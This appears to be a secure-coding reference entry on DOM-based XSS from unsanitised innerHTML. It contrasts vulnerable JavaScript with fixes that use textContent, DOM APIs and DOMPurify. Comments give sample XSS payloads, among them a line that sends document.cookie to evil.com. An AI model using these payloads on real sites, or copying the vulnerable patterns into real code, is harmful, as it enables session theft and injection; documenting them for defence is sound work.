JavaScript innerHTML XSS Vulnerability

Critical Risk Cross-site Scripting

javascriptxssdom-xssinnerHTMLwebinjectionuser-inputclient-sidecross-site-scriptingbrowser

What it is

A critical vulnerability that occurs when JavaScript applications directly assign user input to the innerHTML property of DOM elements without proper sanitization. This allows attackers to inject malicious HTML and JavaScript code that gets executed in the browser, leading to cross-site scripting (XSS) attacks.

Language:

// Vulnerable: Direct innerHTML assignment
function displayUserContent(content) {
    // Directly inserting user content - XSS risk!
    document.getElementById('user-content').innerHTML = content;
}

function handleCommentSubmission() {
    const comment = document.getElementById('comment-input').value;
    const userInfo = document.getElementById('user-info').value;

    // XSS vulnerability - no sanitization
    const html = '<div class="comment">' + comment + '</div>' +
                 '<div class="user">' + userInfo + '</div>';

    document.getElementById('comments-section').innerHTML += html;
}

// Attack vector: User enters: <script>alert('XSS')</script>
// Or: <img src=x onerror="steal_cookies()">

// Fixed: Safe content handling
function displayUserContent(content) {
    // Safe: Use textContent for text content
    document.getElementById('user-content').textContent = content;
}

function handleCommentSubmission() {
    const comment = document.getElementById('comment-input').value;
    const userInfo = document.getElementById('user-info').value;

    // Safe: Use DOM APIs to build structure
    const commentDiv = document.createElement('div');
    commentDiv.className = 'comment';
    commentDiv.textContent = comment; // Auto-escaped

    const userDiv = document.createElement('div');
    userDiv.className = 'user';
    userDiv.textContent = userInfo; // Auto-escaped

    const container = document.createElement('div');
    container.appendChild(commentDiv);
    container.appendChild(userDiv);

    document.getElementById('comments-section').appendChild(container);
}

// Alternative: HTML sanitization for rich content
import DOMPurify from 'dompurify';

function displayRichContent(htmlContent) {
    // Safe: Sanitize HTML before insertion
    const cleanHTML = DOMPurify.sanitize(htmlContent, {
        ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'p', 'br'],
        ALLOWED_ATTR: []
    });
    document.getElementById('content').innerHTML = cleanHTML;
}

💡 Why This Fix Works

The vulnerable code directly assigns user input to innerHTML without sanitization. The fixed version uses textContent and DOM APIs for safe content handling, or DOMPurify for controlled HTML rendering.

Why it happens

Directly assigning user input to innerHTML bypasses browser security mechanisms and allows arbitrary HTML and JavaScript execution. This is one of the most common DOM-based XSS vulnerabilities.

Root causes

Direct innerHTML Assignment with User Input

Directly assigning user input to innerHTML bypasses browser security mechanisms and allows arbitrary HTML and JavaScript execution. This is one of the most common DOM-based XSS vulnerabilities.

Preview example – JAVASCRIPT

// VULNERABLE: Direct innerHTML assignment
function displayUserContent(content) {
    // Directly inserting user content - XSS risk!
    document.getElementById('user-content').innerHTML = content;
}
// Attack: content = "<script>alert('XSS')</script>"
// Attack: content = "<img src=x onerror='steal_cookies()'>"

String Concatenation with innerHTML

Building HTML strings by concatenating user input and then assigning to innerHTML creates injection vulnerabilities. Each concatenated user input represents a potential attack vector.

Preview example – JAVASCRIPT

// VULNERABLE: String concatenation with innerHTML
function addComment(comment, author) {
    const html = '<div class="comment">' + comment + '</div>' +
                 '<div class="author">' + author + '</div>';
    document.getElementById('comments').innerHTML += html;
}
// Attack: comment = "</div><script>fetch('//evil.com/steal?data='+document.cookie)</script>"

Template Literals with User Data

Using template literals (backticks) to build HTML with user input creates the same vulnerabilities as string concatenation. Template literals provide no inherent protection against XSS attacks.

Preview example – JAVASCRIPT

// VULNERABLE: Template literals with user input
function createUserProfile(name, bio) {
    const profileHTML = `
        <div class="profile">
            <h2>${name}</h2>
            <p class="bio">${bio}</p>
        </div>
    `;
    document.getElementById('profile').innerHTML = profileHTML;
}
// Attack: bio = "</p><iframe src='javascript:alert(\"XSS\")'></iframe>"

Dynamic Content Updates with innerHTML

Updating page content dynamically using innerHTML with data from user input, form submissions, or URL parameters creates persistent XSS vulnerabilities that can affect multiple users.

Preview example – JAVASCRIPT

// VULNERABLE: Dynamic content updates
function updateStatus(message) {
    // User message displayed without sanitization
    document.querySelector('.status').innerHTML = 
        `<div class="alert">${message}</div>`;
}

// Called with URL parameter or form data
const urlParams = new URLSearchParams(window.location.search);
updateStatus(urlParams.get('message'));
// Attack: ?message=<svg/onload=alert('XSS')>

Fixes

Use textContent for Text Content

For plain text content, always use textContent instead of innerHTML. textContent automatically escapes all content and prevents any HTML interpretation.